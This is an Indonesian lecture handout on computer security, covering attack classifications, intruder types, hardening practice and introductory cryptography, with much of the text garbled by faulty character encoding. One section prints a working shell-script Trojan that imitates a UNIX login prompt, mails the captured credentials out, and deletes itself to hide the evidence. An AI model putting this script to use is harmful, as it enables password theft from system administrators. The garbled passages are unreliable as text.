Keamanan Komputer

DIKTAT KULIAH KEAMANAN KOMPUTER

PENDAHULUAN
Modal dasar :
Mengetahui Bahasa Pemrograman
Menguasai pengetahuan perangkat keras dan perangkat lunak pengontrolnya (logika
interfacing).
Menguasai pengelolaan instalasi komputer.
Menguasai dengan baik teori jaringan komputer ; protokol, infrastruktur, media
komunikasi.
Memahami cara kerja system operasi.
Memiliki pikiran jahat ;!p
Cara belajar :
"ari buku!buku mengenai keamanan komputer cetakan, e!book, majalah!majalah#tabloid
komputer edisi cetak maupun edisi online.
$kses ke situs!situs re%ie& keamanan (contoh' &&&.cert.org ), situs!situs underground
(silahkan cari %ia search engine).
Pelajari re%ie& atau manual book perangkat keras dan perangkat lunak untuk memahami
cara kerja dengan baik.
Keamanan Komputer Menapa d!butu"#an $
information-based society(, menyebabkan nilai informasi menjadi sangat penting dan
menuntut kemampuan untuk mengakses dan menyediakan informasi secara cepat dan
akurat menjadi sangat esensial bagi sebuah organisasi,
)nfrastruktur *aringan komputer, seperti +$, dan )nternet, memungkinkan untuk
menyediakan informasi secara cepat, sekaligus membuka potensi adanya lubang
keamanan (security hole)
Keja"atan Komputer sema#!n men!n#at #arena :
$plikasi bisnis berbasis -) dan jaringan komputer meningkat ' online banking, e!
commerce, .lectronic data )nterchange (./)).
/esentralisasi ser%er.
-ransisi dari single %endor ke multi %endor.
Meningkatnya kemampuan pemakai (user).
0esulitan penegak hokum dan belum adanya ketentuan yang pasti.
1emakin kompleksnya system yang digunakan, semakin besarnya source code
program yang digunakan.
Berhubungan dengan internet.
Klas!%!#as! #eja"atan Komputer :
2al ' 3
+e%el annoying +e%el /angerous
Keamanan Komputer
Menurut /a%id )co%e 4*ohn /. 2o&ard, An Analysis Of Security Incidents On The Internet
1989 - 1995,( Ph/ thesis, .ngineering and Public Policy, "arnegie Mellon 6ni%ersity, 3778.9
berdasarkan lubang keamanan, keamanan dapat
diklasifikasikan menjadi empat, yaitu'
1. Keamanan &an bers!%at %!s!# (physical security)' termasuk akses orang ke gedung,
peralatan, dan media yang digunakan. "ontoh '
:iretapping atau hal!hal yang ber!hubungan dengan akses ke kabel atau
komputer yang digunakan juga dapat dimasukkan ke dalam kelas ini.
Denial of serice, dilakukan misalnya dengan mematikan peralatan atau
membanjiri saluran komunikasi dengan pesan!pesan (yang dapat berisi apa saja
karena yang diuta!makan adalah banyaknya jumlah pesan).
Syn !lood Attack, dimana sistem (host) yang dituju dibanjiri oleh permintaan
sehingga dia menjadi ter!lalu sibuk dan bahkan dapat berakibat macetnya
sistem (hang).
2. Keamanan &an ber"ubunan denan oran 'personel), "ontoh '
)dentifikasi user (username dan pass&ord)
Profil resiko dari orang yang mempunyai akses (pemakai dan pengelola).

3. Keamanan dar! data dan med!a serta te#n!# #omun!#as! (communications).
4. Keamanan dalam operasi' $danya prosedur yang digunakan untuk mengatur dan
mengelola sistem keamanan, dan juga ter!masuk prosedur setelah serangan (post
attac" recoery).
2al ' ;
Kara#ter!st!# Pen&usup :
3. -he "urious (1i )ngin -ahu) ! tipe penyusup ini
pada dasarnya tertarik menemukan jenis sistem dan
data yang anda miliki.
;. -he Malicious (1i Perusak) ! tipe penyusup ini
berusaha untuk merusak sistem anda, atau merubah
&eb page anda, atau sebaliknya membuat &aktu dan
uang anda kembali pulih.
<. -he 2igh!Profile )ntruder (1i Profil -inggi) ! tipe
penyusup ini berusaha menggunakan sistem anda
untuk memperoleh popularitas dan ketenaran. /ia
mungkin menggunakan sistem profil tinggi anda untuk
mengiklankan kemampuannya.
=. -he "ompetition (1i Pesaing) ! tipe penyusup ini
tertarik pada data yang anda miliki dalam sistem anda.
)a mungkin seseorang yang beranggapan bah&a anda
memiliki sesuatu yang dapat menguntungkannya
secara keuangan atau sebaliknya.
Keamanan Komputer
A(PEK KEAMANAN KOMPUTER :
Menurut >arfinkel 41imson >arfinkel, #$#% #retty $ood #riacy,( ?@eilly A $ssoci!ates,
)nc., 3775. 9
)* Pr!+a,& - Con%!dent!al!t&
/efenisi ' menjaga informasi dari orang yang tidak berhak mengakses.
Pri%acy ' lebih kearah data!data yang sifatnya pri%at , "ontoh ' e!mail seorang pemakai
(user) tidak boleh dibaca oleh administrator.
"onfidentiality ' berhubungan dengan data yang diberikan ke pihak lain untuk
keperluan tertentu dan hanya diperbolehkan untuk keperluan tertentu tersebut.
"ontoh ' data!data yang sifatnya pribadi (seperti nama, tempat tanggal lahir, social
security number, agama, status perka&inan, penyakit yang pernah diderita, nomor kartu
kredit, dan sebagainya) harus dapat diproteksi dalam penggunaan dan penyebarannya.
Bentuk 1erangan ' usaha penyadapan (dengan program sniffer).
6saha!usaha yang dapat dilakukan untuk meningkatkan pri%acy dan confidentiality
adalah dengan menggunakan teknologi kriptografi.
Inter!t&
/efenisi ' informasi tidak boleh diubah tanpa seijin pemilik informasi.
"ontoh ' e!mail di intercept di tengah jalan, diubah isinya, kemudian diteruskan ke alamat
yang dituju.
Bentuk serangan ' $danya %irus, tro&an horse, atau pemakai lain yang mengubah
informasi tanpa ijin, Bman in the middle attack( dimana seseorang menempatkan diri di
tengah pembicaraan dan menyamar sebagai orang lain.
Aut"ent!,at!on
/efenisi ' metoda untuk menyatakan bah&a informasi betul!betul asli, atau orang yang
mengakses atau memberikan informasi adalah betul!betul orang yang dimaksud.
2al ' <
Ist!la" ba! pen&usup :
3. Mundane ; tahu mengenai hacking tapi tidak
mengetahui metode dan prosesnya.
;. lamer (script kiddies) ; mencoba script; yang
pernah di buat oleh akti%is hacking, tapi tidak
paham bagaimana cara membuatnya.
<. &annabe ; paham sedikit metode hacking, dan
sudah mulai berhasil menerobos sehingga
berfalsafah ; 2$"0 )1 MC @.+)>)?,.
=. lar%a (ne&bie) ; hacker pemula, teknik
hacking mulai dikuasai dengan baik, sering
bereksperimen.
5. hacker ; akti%itas hacking sebagai profesi.
D. &iEard ; hacker yang membuat komunitas
pembelajaran di antara mereka.
8. guru ; master of the master hacker, lebih
mengarah ke penciptaan tools!tools yang
po&erfull yang salah satunya dapat menunjang
akti%itas hacking, namun lebih jadi tools
pemrograman system yang umum.
Keamanan Komputer
/ukungan '
$danya -ools membuktikan keaslian dokumen, dapat dilakukan dengan teknologi
&atermarking(untuk menjaga intellectual property(, yaitu dengan menandai
dokumen atau hasil karya dengan Btanda tangan( pembuat ) dan digital signature.
$ccess control, yaitu berkaitan dengan pembatasan orang yang dapat mengakses
informasi. 6ser harus menggunakan pass&ord, biometric (ciri!ciri khas orang), dan
sejenisnya.
A+a!lab!l!t&
/efenisi ' berhubungan dengan ketersediaan informasi ketika dibutuhkan.
"ontoh hambatan '
denial of serice attack( (/o1 attack), dimana ser%er dikirimi permintaan (biasanya
palsu) yang bertubi!tubi atau permintaan yang diluar perkiraan sehingga tidak dapat
melayani permintaan lain atau bahkan sampai do'n, hang, crash.
mailbomb, dimana seorang pemakai dikirimi e!mail bertubi!tubi (katakan ribuan e!
mail) dengan ukuran yang besar sehingga sang pemakai tidak dapat membuka e!
mailnya atau kesulitan mengakses e!mailnya.
A,,ess Control
/efenisi ' cara pengaturan akses kepada informasi. berhubungan dengan masalah
authentication dan juga pri%acy
Metode ' menggunakan kombinasi userid#pass&ord atau dengan
menggunakan mekanisme lain.
Non.repud!at!on
/efenisi ' $spek ini menjaga agar seseorang tidak dapat menyangkal telah melakukan
sebuah transaksi. /ukungan bagi electronic commerce.
(ECURIT/ ATTACK MODEL(
Menurut :. 1tallings 4:illiam 1tallings, (et'or" and Internet'or" Security,( Prentice
2all, 3775.9 serangan (attack) terdiri dari '
Interruption: Perangkat sistem menjadi rusak atau tidak tersedia. 1erangan ditujukan
kepada ketersediaan (aailability) dari sistem. "ontoh serangan adalah Bdenial of ser%ice
attack(.
Interception: Pihak yang tidak ber&enang berhasil mengakses asset atau informasi.
"ontoh dari serangan ini adalah penyadapan ('iretapping).
Modification: Pihak yang tidak ber&enang tidak saja berhasil mengakses, akan tetapi
dapat juga mengubah (tamper) aset. "ontoh dari serangan ini antara lain adalah mengubah
isi dari &eb site dengan pesan!pesan yang merugikan pemilik &eb site.
Fabrication: Pihak yang tidak ber&enang menyisipkan objek palsu ke dalam sistem.
"ontoh dari serangan jenis ini adalah memasukkan pesan!pesan palsu seperti e!mail palsu
ke dalam jaringan komputer.
2al ' =
Keamanan Komputer
(ECURIT/ 0REACH ACCIDENT
377D )*S* !ederal +omputer Incident ,esponse +apability (Fed")@")
melaporkan bah&a lebih dari ;5GG Binsiden( di system komputer atau
jaringan komputer yang disebabkan oleh gagalnya sistem keamanan atau
adanya usaha untuk membobol sistem keamanan
377D !-I (ational +omputer +rimes S.uad, :ashington /.".,
memperkirakan kejahatan komputer yang terdeteksi kurang dari 35H, dan
hanya 3GH dari angka itu yang dilaporkan
3778 Penelitian Deloitte Touch Tohmatsu menunjukkan bah&a dari <GG
perusahaan di $ustralia, <8H (dua diantara lima) pernah mengalami
masalah keamanan sistem komputernya.
377D )nggris, (++ Information Security -reaches Surey menunjukkan bah&a
kejahatan komputer menaik ;GGH dari tahun 3775 ke 377D. 0erugian
rata!rata 61 I<G.GGG # insiden.
377J FB) melaporkan bah&a kasus persidangan yang berhubungan
dengan kejahatan komputer meroket 75GH dari tahun 377D ke
tahun 3778, dengan penangkapan dari = ke =;, dan terbukti
(conicted) di pengadilan naik JJH dari 3D ke <G kasus.
/an lain!lain. /apat dilihat di &&&.cert.org
"ontoh akibat dari jebolnya sistem keamanan, antara lain'
37JJ 0eamanan sistem mail sendmail dieksploitasi oleh @obert
-apan Morris sehingga melumpuhkan sistem )nternet. 0egiatan
ini dapat diklasifikasikan sebagai denial of serice attack(.
/iperkirakan biaya yang digunakan untuk memperbaiki dan hal!hal lain
yang hilang adalah sekitar I3GG juta. /i tahun 377G Morris
dihukum (con%icted) dan hanya didenda I3G.GGG.
3G Maret 3778 1eorang hacker dari Massachusetts berhasil mematikan sistem
telekomunikasi di sebuah airport local (:orcester, Massachusetts)
sehingga mematikan komunikasi di control to&er dan menghalau
pesa&at yang hendak mendarat.
/ia juga mengacaukan sistem telepon di @utland, Massachusetts.
http'##&&&.ne&s.com#,e&s#)tem#-eKtonly#G,;5,;G;8J,GG.htmlLpf%
377G 0e%in Poulsen mengambil alih system komputer telekomunikasi di +os
$ngeles untuk memenangkan kuis di sebuah radio local.
3775 0e%in Mitnick, mencuri ;G.GGG nomor kartu kredit, menyalin system
operasi /." secara illegal dan mengambil alih hubungan telpon di ,e&
Cork dan "alifornia.
3775 Mladimir +e%in membobol bank!bank di ka&asan :allstreet,
mengambil uang sebesar I3G juta.
;GGG Fabian "lone menjebol situs aetna.co.id dan *akarta mail dan membuat
directory atas namanya berisi peringatan terhadap administrator situs
tersebut.
;GGG Beberapa &eb site )ndonesia sudah dijebol dan daftarnya (beserta
contoh halaman yang sudah dijebol) dapat dilihat di koleksi
Nhttp'##&&&.;DGG.comO
;GGG :enas, membuat ser%er sebuah )1P di singapura do&n
2al ' 5
Keamanan Komputer
MEMAHAMI HACKER 0EKER1A
1ecara umum melalui tahapan!tahapan sebagai berikut '
3. -ahap mencari tahu system komputer sasaran.
;. -ahap penyusupan
<. -ahap penjelajahan
=. -ahap keluar dan menghilangkan jejak.
"ontoh kasus -rojan 2ouse, memanfaatkan 12.++ script 6,)P '
Seoran/ /adis canti" dan /enit peserta "uliah )(I0 di sebuah per/uruan tin//i memili"i
potensi memancin/ pen/elola sistem "omputer (administrator peme/an/ account root * * *
hmmm1 yan/ len/ah* Ia melapor"an bah'a "omputer tempat ia mela"u"an tu/as-tu/as )(I0
yan/ diberi"an tida" dapat diper/una"an* San/ pen/elola sistem "omputer tentu sa&a den/an
/a/ah per"asa in/in menun&u""an "e"uasaan seba/ai administrator )(I0*
23ell4 ini soal "ecil* 5un/"in pass'ord "amu "e blo"ir4 biar saya perbai"i dari tempat
"amu24 u&ar administrator )(I0 sombon/ sambil dudu" disebelah /adis canti" dan /enit
peserta "uliah tersebut*
6eeso"an harinya4 ter&adilah "e"acauan di sistem )(I0 "arena didu/a ter&adi penyusupan
oleh hac"er termasu" &u/a hompepa/e per/uruan tin//i tersebut di-obo"-obo"4 ma"lum
pen/elolanya masih sama* Selan&utnya piha" per/uruan tin//i men/eluar"an press release
bah'a homepa/e mere"a di&ebol oleh hac"er dari 7uar (e/eri * * * * hihiii
,ah sebenarnya apa sih yang terjadi L
1ederhana, gadis cantik dan genit peserta kuliah 6,)P tersebut menggunakan program kecil
myQlogin dalam bentuk shell script yang menyerupai layar login dan pass&ord sistem 6,)P
sebagai berikut'
#!/bin/sh
###################################
# Nama program : my_login
# Deskripsi :Program kuda trojan sederhana
# versi 1. Nopember 1!!!
####################################
"#$N%&'(
"at /et)/issue
*hile + ,-"#$N%&', .ne / 0
do
let "#$N%&'(-"#1$N%&'21
e)ho ,login: 3),
read 4#51N
stty e)ho
e)ho ,pass6ord: 3),
read P788*#'D
e)ho ,$ser -4#51N : -P788*#'D, 9 mail gadis:)ompany.)om
stty e)ho
e)ho
e)ho ,4ogin 1n)orre)t,
done
rm -
kill .! -PP1D
$pabila program ini dijalankan maka akan ditampilkan layar login seperti layaknya a&al
penggunaan komputer pdaa sistem 6,)P'
Login:
Password:
2al ' D
Keamanan Komputer
+ihatlah, $dministrator 6,)P yang gagah perkasa tadi yang tidak melihat gadis tersebut
menjalankan program ini tentunya tidak sadar bah&a ini merupakan layar tipuan. +ayar login
ini tidak terlihat beda dibanding layar login sesungguhnya.
1eperti pada program login sesungguhnya, sistem komputer akan meminta pemakai untuk
login ke dalam sistem. 1etelah diisi pass&ord dan di enter,maka segera timbul pesan
Login:root
Password: ********
Login Incorrect
-entu saja $dministrator 6,)P akan kaget bah&a pass&ordnya ternyata (seolah!olah) salah.
6ntuk itu ia segera mengulangi login dan pass&ord. 1etelah dua kali ia mencoba login dan
tidak berhasil, maka loginnya dibatalkan dan kembali keluar 6,)P.
Perhatikan program di atas baik!baik, sekali pemakai tersebut mencoba login dan mengisi
pass&ord pada layar di atas, setelah itu maka otomatis data login dan pass&ord tersebut akan
di email ke mailto'hackerRcompany.com. 1ampai disini maka si gadis lugu dan genit telah
mendapatkan login dan pass&ord . . . ia ternyata seorang hacker SS
:alaupun sederhana, jika kita perhatikan lebih jauh lagi, maka program ini juga memiliki
beberapa trik hacker lainnya, yaitu proses penghilangan jejak (masih ingat tahapan hacker
yang ditulis di atas L). Proses ini dilakukan pada ; baris terakhir dari program myQlogin di
atas, yaitu
rm $0
kill 9 $PPID
yang artinya akan segera dilakukan proses penghapusan program myQlogin dan hapus pula )/
dari proses. /engan demikian hilanglah program tersebut yang tentunya juga menhilangkan
barang bukti. /itambah lagi penghapusan terhadap jejak proses di dalam sistem 6,)P. Tap . .
. hilang sudah tanda!tanda bah&a hacker nya ternyata seorang gadis peserta kuliahnya.
1ukses dari program ini sebenarnya sangat tergantung dari bagaimana agar aplikasi ini dapat
dieksekusi oleh root. 2acker yang baik memang harus berusaha memancing agar pemilik root
menjalankan program ini.
PRIN(IP DA(AR PERANCAN2AN (I(TEM /AN2 AMAN
3. Mencegah hilangnya data
;. Mencegah masuknya penyusup
LAPI(AN KEAMANAN :
3. +apisan Fisik '
membatasi akses fisik ke mesin '
o $kses masuk ke ruangan komputer
o penguncian komputer secara hard&are
o keamanan B)?1
o keamanan Bootloader
back!up data '
o pemilihan piranti back!up
o penjad&alan back!up
mendeteksi gangguan fisik '
2al ' 8
Keamanan Komputer
log file ' +og pendek atau tidak lengkap, +og yang berisikan &aktu yang aneh, +og
dengan permisi atau kepemilikan yang tidak tepat, "atatan pelayanan reboot atau
restart, +og yang hilang, masukan su atau login dari tempat yang janggal
mengontrol akses sumber daya.
;. 0eamanan lokal
Berkaitan dengan user dan hak!haknya '
Beri mereka fasilitas minimal yang diperlukan.
2ati!hati terhadap saat#dari mana mereka login, atau tempat seharusnya mereka login.
Pastikan dan hapus rekening mereka ketika mereka tidak lagi membutuhkan akses.
<. 0eamanan @oot
0etika melakukan perintah yang kompleks, cobalah dalam cara yang tidak merusak
dulu, terutama perintah yang menggunakan globbing' contoh, anda ingin melakukan
Urm fooV.bakU, pertama coba dulu' Uls fooV.bakU dan pastikan anda ingin menghapus
file!file yang anda pikirkan.
Beberapa orang merasa terbantu ketika melakukan Utouch #!iU pada sistem mereka.
2al ini akan membuat perintah!perintah seperti ' Urm !fr VU menanyakan apakah anda
benar!benar ingin menghapus seluruh file. (1hell anda menguraikan U!iU dulu, dan
memberlakukannya sebagai option !i ke rm).
2anya menjadi root ketika melakukan tugas tunggal tertentu. *ika anda berusaha
mengetahui bagaimana melakukan sesuatu, kembali ke shell pemakai normal hingga
anda yakin apa yang perlu dilakukan oleh root.
*alur perintah untuk pemakai root sangat penting. *alur perintah, atau %ariabel
lingkungan P$-2 mendefinisikan lokal yang dicari shell untuk program. "obalah
dan batasi jalur perintah bagi pemakai root sedapat mungkin, dan jangan pernah
menggunakan W.W, yang berarti Wdirektori saat iniW, dalam pernyataan P$-2 anda.
1ebagai tambahan, jangan pernah menaruh direktori yang dapat ditulis pada jalur
pencarian anda, karena hal ini memungkinkan penyerang memodifikasi atau menaruh
file biner dalam jalur pencarian anda, yang memungkinkan mereka menjadi root
ketika anda menjalankan perintah tersebut.
*angan pernah menggunakan seperangkat utilitas rlogin#rsh#reKec (disebut utilitas r)
sebagai root. Mereka menjadi sasaran banyak serangan, dan sangat berbahaya bila
dijalankan sebagai root. *angan membuat file .rhosts untuk root.
File #etc#securetty berisikan daftar terminal!terminal tempat root dapat login. 1ecara
baku (pada @ed2at +inuK) diset hanya pada konsol %irtual lokal (%ty). Berhati!hatilah
saat menambahkan yang lain ke file ini. $nda seharusnya login dari jarak jauh
sebagai pemakai biasa dan kemudian WsuW jika anda butuh (mudah!mudahan melalui
ssh atau saluran terenkripsi lain), sehingga tidak perlu untuk login secara langsung
sebagai root.
1elalu perlahan dan berhati!hati ketika menjadi root. -indakan anda dapat
mempengaruhi banyak hal. Pikir sebelum anda mengetikS
=. 0eamanan File dan system file
/irectory home user tidak boleh mengakses perintah mengubah system seperti partisi,
perubahan de%ice dan lain!lain.
+akukan setting limit system file.
$tur akses dan permission file ' read, &rita, eKecute bagi user maupun group.
1elalu cek program!program yang tidak dikenal
5. 0eamanan Pass&ord dan .nkripsi
2ati!hati terhadap bruto force attack dengan membuat pass&ord yang baik.
1elalu mengenkripsi file yang dipertukarkan.
+akukan pengamanan pada le%el tampilan, seperti screen sa%er.
2al ' J
Keamanan Komputer
D. 0eamanan 0ernel
selalu update kernel system operasi.
)kuti re%ie& bugs dan kekurang!kekurangan pada system operasi.
8. 0eamanan *aringan
:aspadai paket sniffer yang sering menyadap port .thernet.
+akukan prosedur untuk mengecek integritas data
Merifikasi informasi /,1
+indungi net&ork file system
>unakan fire&all untuk barrier antara jaringan pri%at dengan jaringan eksternal
2al ' 7
Keamanan Komputer
KRIPTOGRAFI
DE3ENI(I
Cryptography adalah suatu ilmu ataupun seni mengamankan pesan, dan dilakukan oleh
cryptographer.
Cryptanalysis adalah suatu ilmu dan seni membuka (breaking) ciphertext dan orang yang
melakukannya disebut cryptanalyst.
ELEMEN
CR/PTO(/(TEM
Cryptographic system atau cryptosystem adalah suatu fasilitas untuk mengkonversikan
plaintext ke ciphertext dan sebaliknya. Dalam sistem ini, seperangkat parameter yang
menentukan transformasi pencipheran tertentu disebut suatu set kunci. Proses enkripsi dan
dekripsi diatur oleh satu atau beberapa kunci kriptografi.
)* Kr!ptora%! dapat memenu"! #ebutu"an umum suatu transa#s!:
3. 0erahasiaan (confidentiality) dijamin dengan melakukan enkripsi
(penyandian).
;. 0eutuhan (inte/rity) atas data!data pembayaran dilakukan dengan fungsi
hash satu arah.
<. *aminan atas identitas dan keabsahan (authenticity) pihak!pihak yang
melakukan transaksi dilakukan dengan menggunakan pass'ord atau sertifikat
digital. 1edangkan keotentikan data transaksi dapat dilakukan dengan tanda
tangan digital.
=. -ransaksi dapat dijadikan barang bukti yang tidak bisa disangkal (non-
repudiation) dengan memanfaatkan tanda tangan digital dan sertifikat digital.
4* Kara#ter!st!# ,r&ptos&tem &an ba!# sebaa! ber!#ut :
3. 0eamanan sistem terletak pada kerahasiaan kunci dan bukan pada kerahasiaan
algoritma yang digunakan.
;. "ryptosystem yang baik memiliki ruang kunci (keyspace) yang besar.
<. "ryptosystem yang baik akan menghasilkan cipherteKt yang terlihat acak dalam
seluruh tes statistik yang dilakukan terhadapnya.
=. "ryptosystem yang baik mampu menahan seluruh serangan yang telah dikenal
sebelumnya
5* MACAM CR/PTO(/(TEM
$. 1ymmetric "ryptosystem
2al ' 3G
Keamanan Komputer
/alam symmetric cryptosystem ini, kunci yang digunakan untuk proses enkripsi dan dekripsi
pada prinsipnya identik, tetapi satu buah kunci dapat pula diturunkan dari kunci yang lainnya.
0unci!kunci ini harus dirahasiakan. ?leh karena itulah sistem ini sering disebut sebagai
secret-"ey ciphersystem. *umlah kunci yang dibutuhkan umumnya adalah '
n
"
;
X n . (n!3)
!!!!!!!!
;
dengan n menyatakan banyaknya pengguna.
"ontoh dari sistem ini adalah /ata .ncryption 1tandard (/.1), Blo&fish, )/.$.
B. $ssymmetric "ryptosystem
/alam assymmetric cryptosystem ini digunakan dua buah kunci. 1atu kunci yang disebut
kunci publik (public "ey) dapat dipublikasikan, sedang kunci yang lain yang disebut kunci
pri%at (priate "ey) harus dirahasiakan. Proses menggunakan sistem ini dapat diterangkan
secara sederhana sebagai berikut ' bila $ ingin mengirimkan pesan kepada B, $ dapat
menyandikan pesannya dengan menggunakan kunci publik B, dan bila B ingin membaca surat
tersebut, ia perlu mendekripsikan surat itu dengan kunci pri%atnya. /engan demikian kedua
belah pihak dapat menjamin asal surat serta keaslian surat tersebut, karena adanya mekanisme
ini. "ontoh sistem ini antara lain @1$ 1cheme dan Merkle!2ellman 1cheme.
6* PROTOKOL CR/PTO(/(TEM
Cryptographic protocol adalah suatu protokol yang menggunakan kriptografi. Protokol ini
melibatkan sejumlah algoritma kriptografi, namun secara umum tujuan protokol lebih dari
sekedar kerahasiaan. Pihakpihak yang berpartisipasi mungkin saja ingin membagi sebagian
rahasianya untuk menghitung sebuah nilai, menghasilkan urutan random, atau pun
menandatangani kontrak secara bersamaan.
Penggunaan kriptografi dalam sebuah protokol terutama ditujukan untuk mencegah atau pun
mendeteksi adanya eavesdropping dan cheating.
7* 1ENI( PEN/ERAN2AN PADA PROTOKOL
"ipherteKt!only attack. /alam penyerangan ini, seorang cryptanalyst memiliki
cipherteKt dari sejumlah pesan yang seluruhnya telah dienkripsi menggunakan
algoritma yang sama.
0no&n!plainteKt attack. /alam tipe penyerangan ini, cryptanalyst memiliki akses
tidak hanya ke cipherteKt sejumlah pesan, namun ia juga memiliki plainteKt pesan!
pesan tersebut.
"hosen!plainteKt attack. Pada penyerangan ini, cryptanalyst tidak hanya memiliki
akses atas cipherteKt dan plainteKt untuk beberapa pesan, tetapi ia juga dapat memilih
plainteKt yang dienkripsi.
$dapti%e!chosen!plainteKt attack. Penyerangan tipe ini merupakan suatu kasus
khusus chosen!plainteKt attack. "ryptanalyst tidak hanya dapat memilih plainteKt
yang dienkripsi, ia pun memiliki kemampuan untuk memodifikasi pilihan berdasarkan
hasil enkripsi sebelumnya. /alam chosen!plainteKt attack, cryptanalyst mungkin
hanya dapat memiliki plainteKt dalam suatu blok besar untuk dienkripsi; dalam
adapti%e!chosen!plainteKt attack ini ia dapat memilih blok plainteKt yang lebih kecil
dan kemudian memilih yang lain berdasarkan hasil yang pertama, proses ini dapat
dilakukannya terus menerus hingga ia dapat memperoleh seluruh informasi.
"hosen!cipherteKt attack. Pada tipe ini, cryptanalyst dapat memilih cipherteKt yang
berbeda untuk didekripsi dan memiliki akses atas plainteKt yang didekripsi.
2al ' 33
Keamanan Komputer
"hosen!key attack. "ryptanalyst pada tipe penyerangan ini memiliki pengetahuan
tentang hubungan antara kunci!kunci yang berbeda.
@ubber!hose cryptanalysis. Pada tipe penyerangan ini, cryptanalyst mengancam,
memeras, atau bahkan memaksa seseorang hingga mereka memberikan kuncinya.
8* 1ENI( PEN/ERAN2AN PADA 1ALUR KOMUNIKA(I
Sniffin/' secara harafiah berarti mengendus, tentunya dalam hal ini yang
diendus adalah pesan (baik yang belum ataupun sudah dienkripsi) dalam suatu
saluran komunikasi. 2al ini umum terjadi pada saluran publik yang tidak aman. 1ang
pengendus dapat merekam pembicaraan yang terjadi.
,eplay attac" 4/2MM 7D9' *ika seseorang bisa merekam pesan!pesan
handsha"e (persiapan komunikasi), ia mungkin dapat mengulang pesan!pesan yang
telah direkamnya untuk menipu salah satu pihak.
Spoofin/ 4/2MM 7D9' Penyerang Y misalnya Maman Y bisa menyamar
menjadi $nto. 1emua orang dibuat percaya bah&a Maman adalah $nto. Penyerang
berusaha meyakinkan pihak!pihak lain bah&a tak ada salah dengan komunikasi yang
dilakukan, padahal komunikasi itu dilakukan dengan sang penipu#penyerang.
"ontohnya jika orang memasukkan P), ke dalam mesin $-M palsu Y yang benar!
benar dibuat seperti $-M asli Y tentu sang penipu bisa mendapatkan P),!nya dan
copy pita magentik kartu $-M milik sang nasabah. Pihak bank tidak tahu bah&a
telah terjadi kejahatan.
5an-in-the-middle 41chn 7D9' *ika spoofin/ terkadang hanya menipu satu
pihak, maka dalam skenario ini, saat $nto hendak berkomunikasi dengan Badu,
Maman di mata $nto seolah!olah adalah Badu, dan Maman dapat pula menipu Badu
sehingga Maman seolah!olah adalah $nto. Maman dapat berkuasa penuh atas jalur
komunikas ini, dan bisa membuat berita fitnah.
METODE CR/PTO2RA3I
)* METODE KUNO
a. =85 1.M. bangsa 1parta, suatu bangsa militer pada jaman Cunani kuno, menggunakan
teknik kriptografi yang disebut scytale, untuk kepentingan perang. 1cytale terbuat dari
tongkat dengan papyrus yang mengelilinginya secara spiral.
0unci dari scytale adalah diameter tongkat yang digunakan oleh pengirim harus sama dengan
diameter tongkat yang dimiliki oleh penerima pesan, sehingga pesan yang disembunyikan
dalam papyrus dapat dibaca dan dimengerti oleh penerima.
2al ' 3;
Keamanan Komputer
b. *ulius "aesar, seorang kaisar terkenal @oma&i yang menaklukkan banyak bangsa di .ropa
dan -imur -engah juga menggunakan suatu teknik kriptografi yang sekarang disebut "aesar
cipher untuk berkorespondensi sekitar tahun DG 1.M. -eknik yang digunakan oleh 1ang
"aesar adalah mensubstitusikan alfabet secara beraturan, yaitu oleh alfabet ketiga yang
mengikutinya, misalnya, alfabet $U digantikan oleh U/U, UBU oleh U.U, dan seterusnya.
1ebagai contoh, suatu pesan berikut '
>ambar ;. "aesar "ipher
/engan aturan yang dibuat oleh *ulius "aesar tersebut, pesan sebenarnya adalah UPenjarakan
panglima di%isi ke tujuh segeraU.
4* TEKNIK DA(AR KRIPTO2RA3I
a* (ubst!tus!
1alah satu contoh teknik ini adalah "aesar cipher yang telah dicontohkan diatas. +angkah
pertama adalah membuat suatu tabel substitusi. -abel substitusi dapat dibuat sesuka hati,
dengan catatan bah&a penerima pesan memiliki tabel yang sama untuk keperluan dekripsi.
Bila tabel substitusi dibuat secara acak, akan semakin sulit pemecahan cipherteKt oleh orang
yang tidak berhak.
$!B!"!/!.!F!>!2!)!*!0!+!M!,!?!P!Z!@!1!-!6!M!:!P!C!T!3!;!<!=!5!D!8!J!7!G!.!,
B!F!3!0!Z!>!$!-!P!*!D!2!C!/!;!P!5!M!M!8!"!J!=!)!7!,!@!.!6!<!+!1!:!,!.!?!T!G
>ambar <. -abel 1ubstitusi
-abel substitusi diatas dibuat secara acak. /engan menggunakan tabel tersebut, dari plainteKt
U5 teknik dasar kriptografiU dihasilkan cipherteKt U+ 8ZD/PD 0BMBM DMPP8;$MB>PU.
/engan menggunakan tabel substitusi yang sama secara dengan arah yang terbalik (re%erse),
plainteKt dapat diperoleh kembali dari cipherteKt!nya.
b* 0lo,#!n
1istem enkripsi terkadang membagi plainteKt menjadi blok!blok yang terdiri dari beberapa
karakter yang kemudian dienkripsikan secara independen. PlainteKt yang dienkripsikan
dengan menggunakan teknik blocking adalah '
2al ' 3<
B+?0 3
B+?0 ;
B+?0 < B+?0 =
B+?0 5 B+?0 D
B+?0 8
Keamanan Komputer
>ambar =. .nkripsi dengan Blocking
/engan menggunakan enkripsi blocking dipilih jumlah lajur dan kolom untuk penulisan
pesan. *umlah lajur atau kolom menjadi kunci bagi kriptografi dengan teknik ini. PlainteKt
dituliskan secara %ertikal ke ba&ah berurutan pada lajur, dan dilanjutkan pada kolom
berikutnya sampai seluruhnya tertulis. "ipherteKt!nya adalah hasil pembacaan plainteKt
secara horiEontal berurutan sesuai dengan blok!nya. *adi cipherteKt yang dihasilkan dengan
teknik ini adalah U50 > 0@-/@$.$)F01P),$- )@?U. PlainteKt dapat pula ditulis secara
horiEontal dan cipherteKtnya adalah hasil pembacaan secara %ertikal.
,* Permutas!
1alah satu teknik enkripsi yang terpenting adalah permutasi atau sering juga disebut
transposisi. -eknik ini memindahkan atau merotasikan karakter dengan aturan tertentu.
Prinsipnya adalah berla&anan dengan teknik substitusi. /alam teknik substitusi, karakter
berada pada posisi yang tetap tapi identitasnya yang diacak. Pada teknik permutasi, identitas
karakternya tetap, namun posisinya yang diacak. 1ebelum dilakukan permutasi, umumnya
plainteKt terlebih dahulu dibagi menjadi blok!blok dengan panjang yang sama.
6ntuk contoh diatas, plainteKt akan dibagi menjadi blok!blok yang terdiri dari D karakter,
dengan aturan permutasi sebagai berikut '
>ambar 5. Permutasi
/engan menggunakan aturan diatas, maka proses enkripsi dengan permutasi dari plainteKt
adalah sebagai berikut '
>ambar D. Proses .nkripsi dengan Permutasi
2al ' 3=
Keamanan Komputer
"ipherteKt yang dihasilkan dengan teknik permutasi ini adalah U, .-05 10/ $))@0
